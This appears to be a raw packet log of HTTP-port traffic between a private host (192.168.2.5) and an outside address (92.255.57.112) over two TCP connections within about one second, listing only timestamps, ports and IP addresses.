Jan 15, 2025 10:09:10.634243965 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634254932 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634263039 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634268999 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634274960 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634322882 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634325981 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.634335041 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634346962 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634358883 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634367943 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.634377003 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634408951 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.634547949 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634558916 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634569883 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634588003 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634597063 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.634602070 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634615898 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634624004 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.634628057 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634640932 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634653091 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634658098 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.634666920 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634674072 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.634687901 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.634727955 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634740114 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634751081 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634762049 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.634762049 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634784937 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.634872913 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634886980 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634896994 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634907961 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.634917021 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634927988 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634938002 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634941101 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.634951115 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634959936 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.634963989 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634977102 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634987116 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634999990 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.635003090 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.635085106 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.635209084 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.635226011 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.635237932 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.635248899 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.635261059 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.635268927 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.635272026 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.635286093 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.635298014 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.635308981 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.635323048 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.635335922 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.635344028 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.635351896 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.635365963 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.635375023 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.635376930 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.635390997 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.635397911 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.635405064 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.635426998 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.703624964 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.711478949 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711497068 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711517096 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711530924 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711543083 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711565971 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711568117 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.711579084 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711591959 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711604118 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711615086 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.711616993 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711637020 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711652040 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.711659908 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711668968 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.711673975 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711687088 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711704016 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711710930 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.711716890 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711736917 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711745024 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.711754084 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711765051 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711776972 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.711783886 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.711802959 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711813927 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711824894 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711843014 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711864948 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711865902 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.711879015 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711901903 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.711901903 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.711905956 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711924076 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711935043 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.711956024 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.712004900 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.712027073 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.712053061 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.712073088 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.712085962 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.712105036 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.712114096 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.712122917 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.712137938 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.712145090 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.712151051 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.712160110 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.712168932 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.712181091 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.712191105 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.712193012 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.712233067 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.719635963 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.719662905 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.719672918 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.719707012 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.719722986 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.719763994 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.719774008 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.719779015 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.719791889 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.719834089 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.719835043 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.719847918 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.719866991 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.719877005 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.719882965 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.719892025 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.719902039 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.719929934 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.719929934 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.719960928 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720015049 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720026016 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720038891 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720048904 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720065117 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720066071 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.720098019 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.720144033 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720210075 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720263958 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.720276117 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720288038 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720299006 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720315933 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.720321894 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720335007 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720362902 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.720374107 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720375061 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.720387936 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720432997 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.720444918 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720457077 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720468044 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720479965 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720499992 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720516920 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720519066 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.720530033 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720541000 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720541954 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.720551968 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.720554113 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720591068 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720604897 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720614910 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.720619917 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720647097 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.720660925 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720668077 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.720674992 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720688105 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720700026 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720711946 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.720712900 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720751047 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.720813990 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720833063 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720845938 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720851898 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.720856905 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720870018 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720880032 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720881939 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.720895052 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720907927 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720918894 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720930099 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720946074 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.720946074 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.720949888 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720958948 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.720969915 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720980883 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720993042 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.720998049 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.721015930 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721015930 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.721029997 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721040964 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721052885 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721065044 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721066952 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.721079111 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721106052 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.721160889 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721172094 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721183062 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721195936 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721198082 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.721208096 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721220016 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721229076 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.721235037 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721260071 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.721298933 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.721321106 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721333027 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721338987 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721349001 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721359968 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721366882 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.721374035 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721386909 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721389055 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.721400976 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721421957 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.721440077 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721441031 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.721456051 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721471071 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721486092 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721493959 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.721502066 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721517086 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.721518993 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721534014 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721545935 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721555948 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721559048 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.721576929 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.721592903 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.721616983 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.741723061 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.741741896 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.741761923 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.741780043 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.741794109 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.741791964 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.741806030 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.741827011 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.741827965 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.741842985 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.741854906 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.741858006 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.741868019 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.741887093 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.741894960 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.741895914 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.741899967 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.741913080 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.741923094 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.741929054 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.741950035 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.741952896 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.741966009 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.741980076 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.741997004 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742010117 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742019892 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742023945 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742039919 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742054939 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742075920 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742075920 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742099047 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742108107 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742111921 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742124081 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742136002 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742149115 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742161036 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742161989 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742175102 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742188931 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742193937 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742206097 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742212057 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742218971 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742230892 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742248058 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742250919 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742260933 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742275000 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742276907 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742290020 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742301941 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742305994 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742319107 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742336988 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742338896 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742350101 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742362022 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742362976 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742373943 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742387056 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742389917 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742413998 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742455959 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742470026 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742482901 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742496014 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742512941 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742535114 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742547989 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742563009 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742577076 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742580891 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742590904 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742609024 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742650986 CET	80	49707	92.255.57.112	192.168.2.5
